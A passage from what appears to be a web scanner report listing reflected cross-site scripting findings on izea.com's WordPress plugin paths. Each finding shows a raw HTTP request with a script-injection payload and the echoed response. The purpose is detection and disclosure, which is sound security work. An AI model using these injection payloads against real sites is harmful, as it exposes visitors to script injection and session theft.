Path:   /wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92d"><script>alert(1)</script>bbdc0b5b5d0 was submitted in the REST URL parameter 5. This input was echoed as 2f92d\"><script>alert(1)</script>bbdc0b5b5d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/css/nggallery.css2f92d"><script>alert(1)</script>bbdc0b5b5d0 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:24:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css2f92d\"><script>alert(1)</script>bbdc0b5b5d0"/>
...[SNIP]...

1.26. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f07d"><script>alert(1)</script>7f35bca1aff was submitted in the REST URL parameter 1. This input was echoed as 7f07d\"><script>alert(1)</script>7f35bca1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7f07d"><script>alert(1)</script>7f35bca1aff/plugins/nextgen-gallery/shutter/shutter-reloaded.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:02 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content7f07d\"><script>alert(1)</script>7f35bca1aff/plugins/nextgen-gallery/shutter/shutter-reloaded.css"/>
...[SNIP]...

1.27. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7475"><script>alert(1)</script>bde4bc616b8 was submitted in the REST URL parameter 2. This input was echoed as f7475\"><script>alert(1)</script>bde4bc616b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf7475"><script>alert(1)</script>bde4bc616b8/nextgen-gallery/shutter/shutter-reloaded.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:57 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/pluginsf7475\"><script>alert(1)</script>bde4bc616b8/nextgen-gallery/shutter/shutter-reloaded.css"/>
...[SNIP]...

1.28. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74aac"><script>alert(1)</script>32fdcf305a1 was submitted in the REST URL parameter 3. This input was echoed as 74aac\"><script>alert(1)</script>32fdcf305a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery74aac"><script>alert(1)</script>32fdcf305a1/shutter/shutter-reloaded.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery74aac\"><script>alert(1)</script>32fdcf305a1/shutter/shutter-reloaded.css"/>
...[SNIP]...

1.29. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba29e"><script>alert(1)</script>a4ad7cdd920 was submitted in the REST URL parameter 4. This input was echoed as ba29e\"><script>alert(1)</script>a4ad7cdd920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutterba29e"><script>alert(1)</script>a4ad7cdd920/shutter-reloaded.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:21:31 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/shutterba29e\"><script>alert(1)</script>a4ad7cdd920/shutter-reloaded.css"/>
...[SNIP]...

1.30. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a428"><script>alert(1)</script>de68ec77b9d was submitted in the REST URL parameter 5. This input was echoed as 1a428\"><script>alert(1)</script>de68ec77b9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css1a428"><script>alert(1)</script>de68ec77b9d HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:23:08 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:23:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css1a428\"><script>alert(1)</script>de68ec77b9d"/>
...[SNIP]...

1.31. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b24b"><script>alert(1)</script>c412e6cb40e was submitted in the REST URL parameter 1. This input was echoed as 5b24b\"><script>alert(1)</script>c412e6cb40e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content5b24b"><script>alert(1)</script>c412e6cb40e/plugins/nextgen-gallery/shutter/shutter-reloaded.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content5b24b\"><script>alert(1)</script>c412e6cb40e/plugins/nextgen-gallery/shutter/shutter-reloaded.js"/>
...[SNIP]...

1.32. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaac4"><script>alert(1)</script>7fcdaf32a18 was submitted in the REST URL parameter 2. This input was echoed as eaac4\"><script>alert(1)</script>7fcdaf32a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginseaac4"><script>alert(1)</script>7fcdaf32a18/nextgen-gallery/shutter/shutter-reloaded.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/pluginseaac4\"><script>alert(1)</script>7fcdaf32a18/nextgen-gallery/shutter/shutter-reloaded.js"/>
...[SNIP]...

1.33. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload debf0"><script>alert(1)</script>5fa6d3385c9 was submitted in the REST URL parameter 3. This input was echoed as debf0\"><script>alert(1)</script>5fa6d3385c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallerydebf0"><script>alert(1)</script>5fa6d3385c9/shutter/shutter-reloaded.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:20:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:20:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallerydebf0\"><script>alert(1)</script>5fa6d3385c9/shutter/shutter-reloaded.js"/>
...[SNIP]...

1.34. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 550a1"><script>alert(1)</script>f21234d7ecc was submitted in the REST URL parameter 4. This input was echoed as 550a1\"><script>alert(1)</script>f21234d7ecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter550a1"><script>alert(1)</script>f21234d7ecc/shutter-reloaded.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:22:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:22:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/shutter550a1\"><script>alert(1)</script>f21234d7ecc/shutter-reloaded.js"/>
...[SNIP]...

1.35. http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0900"><script>alert(1)</script>75e7db07ad8 was submitted in the REST URL parameter 5. This input was echoed as c0900\"><script>alert(1)</script>75e7db07ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsc0900"><script>alert(1)</script>75e7db07ad8 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:23:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:24:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsc0900\"><script>alert(1)</script>75e7db07ad8"/>
...[SNIP]...

1.36. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7f5"><script>alert(1)</script>bcea1c16a88 was submitted in the REST URL parameter 1. This input was echoed as 7e7f5\"><script>alert(1)</script>bcea1c16a88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7e7f5"><script>alert(1)</script>bcea1c16a88/plugins/sociable/sociable.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:06 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content7e7f5\"><script>alert(1)</script>bcea1c16a88/plugins/sociable/sociable.css"/>
...[SNIP]...

1.37. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aeb6"><script>alert(1)</script>9a0684998a8 was submitted in the REST URL parameter 2. This input was echoed as 6aeb6\"><script>alert(1)</script>9a0684998a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins6aeb6"><script>alert(1)</script>9a0684998a8/sociable/sociable.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins6aeb6\"><script>alert(1)</script>9a0684998a8/sociable/sociable.css"/>
...[SNIP]...

1.38. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de545"><script>alert(1)</script>42ecccfeb5e was submitted in the REST URL parameter 3. This input was echoed as de545\"><script>alert(1)</script>42ecccfeb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociablede545"><script>alert(1)</script>42ecccfeb5e/sociable.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:20:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:20:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
